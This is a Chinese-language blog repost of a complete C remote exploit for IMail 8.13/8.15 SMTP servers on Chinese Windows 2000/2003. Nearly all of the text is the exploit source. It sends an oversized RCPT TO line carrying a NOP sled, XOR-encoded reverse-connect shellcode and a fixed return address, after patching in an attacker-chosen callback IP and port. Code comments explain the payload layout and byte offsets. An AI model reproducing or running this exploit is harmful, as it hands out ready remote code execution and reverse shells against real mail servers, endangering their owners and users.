鬼仔：前段时间发过 IMail 2006 和 8.x 的 Exp，但那个是针对英文版的，当时就有朋友说“有中文版的就好了”。这次就发一个中文版的：Test imail 8.13 / 8.15 on Win2000 and Win2k3 (Chinese version)。
来源:心路
写这个的时候偷了个懒，没有动态生成编码 key，而是直接用一个固定的 key（0x9050d7bd）来异或编码回连 IP 和端口，所以某些监听 IP/端口异或之后会出现 RCPT TO 参数里不能出现的特殊字符（NUL、CR、LF、空格、'>'、'"'）。不过程序会先做判断，遇到这种情况会直接报错退出，不会发送。—_—!
代码:
/*******************************************************************************
* Test imail8.13,8.15 on win2000 and win2k3 chinese version.
* code by 云舒,ph4nt0m.org,2006,11
* dou you know who is icy? ^_^
*******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment( lib, "ws2_32" )
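/* SMTP dialogue lines sent before the overflowing RCPT TO. SMTP lines must end in
 * CRLF; the published listing had the escapes mangled to "/r/n", restored here. */
#define HELO "EHLO\r\n"
/* NOTE(review): the sender address appears to have been replaced by an
 * "[email protected]" placeholder during page extraction; the original value is
 * not recoverable from this listing. Presumably any syntactically valid address
 * is accepted by the server -- confirm against the target before use. */
#define FROM "MAIL FROM <[email protected]>\r\n"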
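/* XOR-encoded reverse-connect payload with its decoder stub prepended.
 * Layout (byte offsets):
 *   0x00  decoder: xor ecx,ecx / sub ecx,-0x48 (ECX = 72) / fldz / fnstenv [esp-0xc] /
 *         pop ebx (EBX = address of the fldz, offset 5) / xor dword [ebx+0x13],key /
 *         sub ebx,-4 / loop -- i.e. 72 dwords = the 288 bytes from offset 0x18 onward.
 *   0x0f  the 32-bit XOR key, little-endian 0x9050d7bd; main() XORs the call-back
 *         address with the same constant so it decodes in place.
 *   0x18  288 bytes of encoded payload. main() overwrites the call-back IP at 0xb8
 *         (a whole dword) and the port at 0xbe (upper half of the dword at 0xbc).
 * The published listing had every "\x" mangled to "/x"; the escapes are restored
 * here and the byte values are unchanged. The array contains no NUL byte, which
 * main() relies on when it measures it with strlen(). */
unsigned char shellcode[] =
/* decoder */
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
/* decode key */
"\xbd\xd7\x50\x90"
"\x83\xeb\xfc\xe2\xf4"
/* encoded payload */
"\x41\xbd\xbb\xdd\x55\x2e\xaf\x6f"
"\x42\xb7\xdb\xfc\x99\xf3\xdb\xd5\x81\x5c\x2c\x95\xc5\xd6\xbf\x1b"
"\xf2\xcf\xdb\xcf\x9d\xd6\xbb\xd9\x36\xe3\xdb\x91\x53\xe6\x90\x09"
"\x11\x53\x90\xe4\xba\x16\x9a\x9d\xbc\x15\xbb\x64\x86\x83\x74\xb8"
"\xc8\x32\xdb\xcf\x99\xd6\xbb\xf6\x36\xdb\x1b\x1b\xe2\xcb\x51\x7b"
"\xbe\xfb\xdb\x19\xd1\xf3\x4c\xf1\x7e\xe6\x8b\xf4\x36\x94\x60\x1b"
"\xfd\xdb\xdb\xe0\xa1\x7a\xdb\xd0\xb5\x89\x38\x1e\xf3\xd9\xbc\xc0"
"\x42\x01\x36\xc3\xdb\xbf\x63\xa2\xd5\xa0\x23\xa2\xe2\x83\xaf\x40"
"\xd5\x1c\xbd\x6c\x86\x87\xaf\x46\xe2\x5e\xb5\xf6\x3c\x3a\x58\x92"
"\xe8\xbd\x52\x6f\x6d\xbf\x89\x99\x48\x7a\x07\x6f\x6b\x84\x03\xc3"
"\xee\x94\x03\xd3\xee\x28\x80\xf8\x7d\x17\x90\x50\xdb\xbf\x77\x9f"
"\xdb\x84\xd9\x71\x28\xbf\xbc\x69\x17\xb7\x07\x6f\x6b\xbd\x40\xc1"
"\xe8\x28\x80\xf6\xd7\xb3\x36\xf8\xde\xba\x3a\xc0\xe4\xfe\x9c\x19"
"\x5a\xbd\x14\x19\x5f\xe6\x90\x63\x17\x42\xd9\x6d\x43\x95\x7d\x6e"
"\xff\xfb\xdd\xea\x85\x7c\xfb\x3b\xd5\xa5\xae\x23\xab\x28\x25\xb8"
"\x42\x01\x0b\xc7\xef\x86\x01\xc1\xd7\xd6\x01\xc1\xe8\x86\xaf\x40"
"\xd5\x7a\x89\x95\x73\x84\xaf\x46\xd7\x28\xaf\xa7\x42\x07\x38\x77"
"\xc4\x11\x29\x6f\xc8\xd3\xaf\x46\x42\xa0\xac\x6f\x6d\xbf\xa0\x1a"
"\xb9\x88\x03\x6f\x6b\x28\x80\x90";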
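/* Print the banner and command-line synopsis to stdout.
 * name: argv[0], echoed in the usage line.
 * <cb_ip> <cb_port> is the listener the patched payload connects back to (main()
 * tells the operator to "check your listing port" after sending).
 * The published listing had "\n" mangled to "/n"; restored here. */
void Usage( char *name )
{
	printf( "\nCode by 云舒(ph4nt0m.org),thx luoluo(ph4nt0m.org)!\n" );
	printf( "Test imail8.13,8.15 on win2000 and win2k3 chinese version.\n" );
	printf( "Dou you know who is icy? ^_^\n" );
	printf( "\nUsage: %s <target_ip> <target_port> <cb_ip> <cb_port>\n", name );
}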
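/* ---- payload layout --------------------------------------------------------
 * RCPT TO <@:|x90 ... x90|shellcode|ret|>\r\n\r\n
 * NOP sled + shellcode always total PAYLOAD_LEN bytes, so ret_addr lands at a
 * fixed position. All escapes in the published listing were mangled to "/x..";
 * every byte value below is taken from that listing, only the escapes are fixed. */
#define RCPT_PREFIX   "RCPT TO <@:"
#define RCPT_SUFFIX   ">\r\n\r\n"
#define PAYLOAD_LEN   548u
#define DECODE_KEY    0x9050d7bdu   /* must equal the key embedded in the decoder stub */
#define IP_OFFSET     0xb8          /* dword-aligned slot of the call-back IP in shellcode[] */
#define PORT_OFFSET   0xbe          /* upper two bytes of the dword at 0xbc: call-back port */
#define RECV_BUF_LEN  512
#define SEND_BUF_LEN  1024

/* Return address appended after the payload (little-endian 0x7ffa1ee1). Target
 * specific: the header names Chinese Win2000/Win2003 builds of IMail 8.13/8.15;
 * presumably a fixed-address trampoline, not verified here. */
static const unsigned char ret_addr[4] = { 0xe1, 0x1e, 0xfa, 0x7f };

/* Bytes that would cut or break the RCPT TO argument before the overflow is
 * reached: NUL, CR, LF, space, '>' and '"'. The call-back address is XOR-encoded
 * with a fixed key, so some IP/port values produce one of these and must be
 * refused rather than sent. */
static const unsigned char forbidden[] = { 0x00, 0x0D, 0x0A, 0x20, 0x3e, 0x22 };

/* Parse a decimal TCP port in 1..65535. Returns 0 on malformed input or an
 * out-of-range value (0 is never usable here). Replaces atoi(), which silently
 * accepted "25abc" or "-1". */
static unsigned short parse_port( const char *text )
{
	char *end = NULL;
	long value = strtol( text, &end, 10 );
	if( end == text || *end != '\0' || value < 1 || value > 65535 )
		return 0;
	return (unsigned short)value;
}

/* Report a failed Winsock call as "<what> error: <code>" and return -1.
 * WSAGetLastError() is the documented accessor for Winsock failures. */
static int sock_error( const char *what )
{
	printf( "%s error: %d\n", what, WSAGetLastError() );
	return -1;
}

/* Send exactly len bytes, looping on short writes. 0 on success, -1 on error. */
static int send_all( SOCKET sock, const char *data, size_t len )
{
	size_t done = 0;
	while( done < len )
	{
		int n = send( sock, data + done, (int)(len - done), 0 );
		if( n == SOCKET_ERROR )
			return -1;
		done += (size_t)n;
	}
	return 0;
}

/* Read one server reply into buf (capacity cap), NUL-terminate it and echo it.
 * Returns 0, or -1 after reporting an error or a closed connection.
 * The original recv()'d the full buffer and then printf'd it, which over-reads
 * when a reply fills all 512 bytes; here one byte is reserved for the terminator. */
static int expect_reply( SOCKET sock, char *buf, size_t cap )
{
	int n = recv( sock, buf, (int)cap - 1, 0 );
	if( n == SOCKET_ERROR )
		return sock_error( "Recv" );
	if( n == 0 )
	{
		printf( "Connection closed by server\n" );
		return -1;
	}
	buf[n] = '\0';
	printf( "%s\n", buf );
	return 0;
}

/* Assemble the RCPT TO line into out (capacity cap) from the already patched
 * shellcode[]. Returns the payload length, or 0 if it would not fit.
 * The original computed 548 - strlen(shellcode) in size_t and looped strcat();
 * a shellcode longer than 548 bytes would wrap that to a huge count and run off
 * the end of the 1024-byte buffer, so both bounds are checked explicitly here. */
static size_t build_payload( unsigned char *out, size_t cap )
{
	size_t sc_len = strlen( (const char *)shellcode );
	if( sc_len > PAYLOAD_LEN )
		return 0;
	size_t pad = PAYLOAD_LEN - sc_len;
	size_t total = (sizeof RCPT_PREFIX - 1) + PAYLOAD_LEN + sizeof ret_addr + (sizeof RCPT_SUFFIX - 1);
	if( total > cap )
		return 0;

	unsigned char *p = out;
	memcpy( p, RCPT_PREFIX, sizeof RCPT_PREFIX - 1 );   p += sizeof RCPT_PREFIX - 1;
	memset( p, 0x90, pad );                               p += pad;          /* NOP sled */
	memcpy( p, shellcode, sc_len );                       p += sc_len;
	memcpy( p, ret_addr, sizeof ret_addr );               p += sizeof ret_addr;
	memcpy( p, RCPT_SUFFIX, sizeof RCPT_SUFFIX - 1 );     p += sizeof RCPT_SUFFIX - 1;
	return (size_t)(p - out);
}

/* Entry point: validate arguments, patch the call-back address into the payload,
 * run the SMTP dialogue (banner, EHLO, MAIL FROM) and send the overflowing RCPT TO.
 * argv: <target_ip> <target_port> <cb_ip> <cb_port>. Returns 0 when the payload
 * was sent, -1 on any validation or socket error. */
int main( int argc, char *argv[] )
{
	if( argc != 5 )
	{
		Usage( argv[0] );
		return -1;
	}

	/* ---- argument validation: fail before touching the network ---- */
	unsigned int target_ip = inet_addr( argv[1] );
	unsigned int cb_ip = inet_addr( argv[3] );
	if( target_ip == INADDR_NONE || cb_ip == INADDR_NONE )
	{
		printf( "Bad IP address, use dotted-quad form\n" );
		return -1;
	}
	unsigned short target_port = parse_port( argv[2] );
	unsigned short cb_port = parse_port( argv[4] );
	if( target_port == 0 || cb_port == 0 )
	{
		printf( "Bad port, expected 1-65535\n" );
		return -1;
	}

	/* ---- encode the call-back address the way the decoder stub expects ----
	 * The stub XORs the payload dword by dword with DECODE_KEY. The IP occupies
	 * a whole dword; the port (network byte order) sits in the upper two bytes
	 * of its dword and is therefore XORed with the upper half of the key. */
	unsigned int enc_ip = cb_ip ^ DECODE_KEY;
	unsigned short enc_port = (unsigned short)( htons( cb_port ) ^ (DECODE_KEY >> 16) );

	/* Refuse encoded bytes that the SMTP parser would choke on (see forbidden[]). */
	unsigned char enc[6];
	memcpy( enc, &enc_ip, 4 );
	memcpy( enc + 4, &enc_port, 2 );
	for( size_t i = 0; i < sizeof forbidden; i++ )
	{
		if( memchr( enc, forbidden[i], 4 ) != NULL )
		{
			printf( "rpwt,haha,please change to another ip adress!\n" );
			return -1;
		}
		if( memchr( enc + 4, forbidden[i], 2 ) != NULL )
		{
			printf( "rpwt,haha,please change to another port\n" );
			return -1;
		}
	}

	/* Patch the encoded address into the payload; guard the offsets against a
	 * shellcode that is shorter than the patch slots. */
	if( strlen( (const char *)shellcode ) < PORT_OFFSET + 2 )
	{
		printf( "shellcode too short for the patch offsets\n" );
		return -1;
	}
	memcpy( shellcode + IP_OFFSET, enc, 4 );
	memcpy( shellcode + PORT_OFFSET, enc + 4, 2 );

	unsigned char send_buf[SEND_BUF_LEN];
	size_t send_len = build_payload( send_buf, sizeof send_buf );
	if( send_len == 0 )
	{
		printf( "payload does not fit in the send buffer\n" );
		return -1;
	}

	/* ---- SMTP dialogue ---- */
	WSADATA wsa;
	int err = WSAStartup( 0x0202, &wsa );
	if( err != 0 )
	{
		/* WSAStartup returns the error code directly; WSAGetLastError() is not set. */
		printf( "WSAStartup error: %d\n", err );
		return -1;
	}

	int rc = -1;
	struct sockaddr_in sin;
	char recv_buf[RECV_BUF_LEN];
	SOCKET sock = socket( AF_INET, SOCK_STREAM, 0 );
	if( sock == INVALID_SOCKET )
	{
		sock_error( "Create socket" );
		goto out_wsa;
	}

	memset( &sin, 0, sizeof sin );
	sin.sin_family = AF_INET;
	sin.sin_addr.S_un.S_addr = target_ip;
	sin.sin_port = htons( target_port );
	if( connect( sock, (struct sockaddr *)&sin, sizeof sin ) == SOCKET_ERROR )
	{
		sock_error( "Connect" );
		goto out_sock;
	}
	printf( "Connect ok!\n" );

	/* banner */
	if( expect_reply( sock, recv_buf, sizeof recv_buf ) < 0 )
		goto out_sock;
	/* EHLO */
	if( send_all( sock, HELO, strlen( HELO ) ) < 0 )
	{
		sock_error( "Send" );
		goto out_sock;
	}
	if( expect_reply( sock, recv_buf, sizeof recv_buf ) < 0 )
		goto out_sock;
	/* MAIL FROM */
	if( send_all( sock, FROM, strlen( FROM ) ) < 0 )
	{
		sock_error( "Send" );
		goto out_sock;
	}
	if( expect_reply( sock, recv_buf, sizeof recv_buf ) < 0 )
		goto out_sock;
	/* overflowing RCPT TO; the response is not awaited, as in the original */
	if( send_all( sock, (const char *)send_buf, send_len ) < 0 )
	{
		sock_error( "Send" );
		goto out_sock;
	}
	printf( "Send exploit %d bytes,check your listing port,good luck!\n", (int)send_len );
	rc = 0;

out_sock:
	closesocket( sock );
out_wsa:
	WSACleanup( );
	return rc;
}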